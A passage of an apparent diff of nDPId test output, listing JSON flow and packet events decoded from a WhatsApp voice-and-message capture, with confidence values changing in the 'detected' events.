-00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820569716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFAABIABZAABAR7RmzPMAwCggAAQ2W0XQANM1bAQMAGCESpEIAALo2Lkt1PTwMswgAIAAIAAGhQp6wzx5AAgAIAAABTZrC1xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432820569716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432820570006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570006,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432820570428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFAABIABhAABAR8bcfDU\/ACggAAQ2W0XQANGvgAQMAGCESpEIAAFk9lyNgFikbVyMAIAAIAAGA\/J6wzx5AAgAIAAABTZrC2ZA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820570428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432820570876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570876,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1432820571176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFAABIABpAABAR5EUfDV0wCggAAQ2W0XQANAkRAQMAGCESpEIAABBswYmYde0br2MAIAAIAAGc8p6wzx5AAgAIAAABTZrC3MQ="} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820571176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432820571488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571488,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820571716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFAABIABxAABAR+EMfDUkwCggAAQ2W0XQANGvUAQMAGCESpEIAAOlKSWdSWOu7U1cAIAAIAAGOsJ6wzx5AAgAIAAABTZrC3xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432820571716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} 